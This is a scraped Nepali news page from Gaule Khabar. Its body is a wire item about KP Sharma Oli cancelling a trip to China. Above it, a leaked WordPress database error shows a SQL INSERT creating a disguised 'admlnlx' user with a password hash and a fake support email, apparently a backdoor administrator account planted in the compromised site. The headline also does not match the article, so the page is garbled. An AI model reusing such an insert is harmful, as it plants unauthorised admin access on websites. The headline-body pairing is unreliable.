WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxVDC1YUfWH.juEId0htAi2WWenFlM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:13:00', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बूढीगण्डकी थुनिएको हैनः प्रहरी – Gaule Khabar

बूढीगण्डकी थुनिएको हैनः प्रहरी

बूढीगण्डकी थुनिएको हैनः प्रहरी

काठमाडौँ, मंसिर २२ –

नेकपा (एमाले) का अध्यक्ष केपीशर्मा ओलीले चीनमा हुने एक अन्तर्राष्ट्रिय सम्मेलनमा आफू भाग लिन जाने पूर्वनिर्धारित कार्यक्रम रद्द गरेको छ ।

मुलुकमा विकसित राजनीतिक परिस्थितिका कारण उहाँले चीन जाने कार्यक्रम रद्द गर्नुभएको हो । चीनको हेवाइ प्रान्तमा यही बिहीबारदेखि हुने बजारसम्बन्धी मञ्चमा अध्यक्ष ओली जाने कार्यक्रम भए पनि व्यवस्थापिका–संसद्मा संविधान संशोधन विधेयक दर्ता भएपछि उत्पन्न राजनीतिक घटनाक्रमका कारण अब सो मञ्चमा पार्टीका महासचिव ईश्वर पोखरेलले भाग लिनुहुने पोखरेलका निजी सचिव दीपेन्द्र श्रेष्ठले जानकारी दिनुभयो ।

सम्मेलनमा नेपालका अन्य दलका प्रतिनिधि तथा अर्थविद्ले पनि भाग लिने कार्यक्रम छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका